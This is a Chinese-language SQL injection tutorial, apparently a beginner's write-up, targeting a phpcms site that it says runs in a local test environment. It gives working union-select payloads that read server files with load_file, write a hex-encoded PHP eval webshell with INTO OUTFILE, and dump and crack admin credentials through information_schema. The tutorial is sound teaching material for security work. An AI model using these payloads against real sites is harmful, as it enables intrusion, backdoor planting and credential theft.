测试环境为win7sp1+iis7.5+mysql5.1,目标为一个小型phpcms网站，存在注入的地址为http://webshell.cc/show.php?id=2
菜菜我第一次写文章……
一． Root权限下的mysql注入

直接在网址后面添加引号https://www.webshell.cc/show.php?id=2'

直接爆出为Mysql数据库，使用xor 1=1 xor 1=2确定为整数型注入;

确定mysql版本号，提交http://webshell.cc/show.php?id=2 and ord(mid(version(),1,1))>51,返回正确，版本大于5.1，支持union查询;

使用order by 确认字段数，15时正确，16时错误，得出字段长度为15;

显示字段位置http://webshell.cc/show.php?id=2 and 1<1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,显示出3和11位置

现在我们来确认当前用户权限，提交http://webshell.cc/show.php?id=2 and 1<1 union select 1,2,user(),4,5,6,7,8,9,10,database(),12,13,14,15

是root权限哦，从root@localhost可以看出当前网站和数据库是位于同一台机器上的，当然我们是在自己的电脑上测试的

既然是root权限，而且是整形注入，我们就可以load_file()了，也可以导出webshell了，我们在3，或11的位置显示load_file()内容，https://www.webshell.cc/show.php?id=2 and 1<1 union select 1,2,load_file('c:\boot.ini'),4,5,6,7,8,9,10,11,12,13,14,15结果没显示出内容，原因是多种多样的，可能3，11的位置不支持字符，也可能二者位置的长度定义的太短，继续提交http://webshell.cc/show.php?id=2 and 1=2 union select 1,2,load_file(char(99,58,47,98,111,111,116,46,105,110,105)),4,5,6,7,8,9,10,11,12,13,14,15

成功爆出c:\boot.ini内容，其中char(99,58,47,98,111,111,116,46,105,110,105)是c:\boot.ini的ascii编码 我们结合out_file来显示内容，前提是知道当前网站路径，直接访问http://webshell.cc/data/爆出当前网站路径（php启用了错误提示，否则爆路径就得想办法猜解了）

接着结合outfile生成webshell,提交http://webshell.cc/show.php?id=2 and 1=2 union select 1,2,0x3C3F706870206576616C28245F504F53545B7A5D293B3F3E,4,5,6,7,8,9,10,11,12,13,14,15 into outfile'F:\\websites\\phpaaCMS-UTF8-0.3.1\\phpaaCMS-UTF8-0.3.1\\1.php'其中0x3C3F706870206576616C28245F504F53545B7A5D293B3F3E是一句话木马的16进制编码,用一句话客户端连接一下

成功

二，非root权限下的注入，利用information_schema系统表

非root权限的用户一般是没有load_file的权限的，因为load_file需要FILE权限，而普通用户一般情况下是没有FILE权限的，这时的注入思路就跟asp下差不多了，但是mysql 5以上的版本有个非常有利的条件就是里面存储了一个系统库information_schema，这个表存储了数据库的系统信息，只要存在注入基本可以确定拿下用户密码，mysql下的表，字段等猜解不再测试，跟asp差不多，现在我们利用information_schema来猜解密码

上文已知,注入地址，及union查询下可显示的字段位置为3，11

https://www.webshell.cc/show.php?id=2 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

提交https://www.webshell.cc/show.php?id=2 and 1=2 union select 1,2,unhex(hex(group_concat(schema_name))),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.schemata，爆出所有数据库名

判断当前数据库名称为phpaa

接着判断当前数据库下的所有的表名称，提交http://webshell.cc/show.php?id=2 and 1=2 union select 1,2,unhex(hex(group_concat(table_name))),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=0x7068706161，爆出当前数据库下所有的表名称，其中0x7068706161是phpaa的hex编码

发现cms_users这个表比较敏感，接着查询这个表下的所有字段名称，提交http://webshell.cc/show.php?id=2 and 1=2 union select 1,2,unhex(hex(group_concat(column_name))),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name=0x636D735F7573657273，

显然字段为用户名和密码字段为username,password，查询之，提交http://webshell.cc/show.php?id=2 and 1=2 union select 1,2,username,4,5,6,7,8,9,10,password,12,13,14,15 from cms_users

上md5网站解这个md5hash,发现为admin,用这个用户成功登陆后台